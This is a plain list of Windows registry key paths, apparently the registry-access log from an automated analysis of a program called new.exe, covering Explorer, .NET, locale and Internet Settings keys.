HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-0c-29-f8-d7-43
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.Vsa__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.Vsa,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorpe.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NativeUnwindInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\MD_TrackColDesMisses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_LOCAL_MACHINE\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\new.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
\xe4\xa4\x90\xe3\x84\x80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
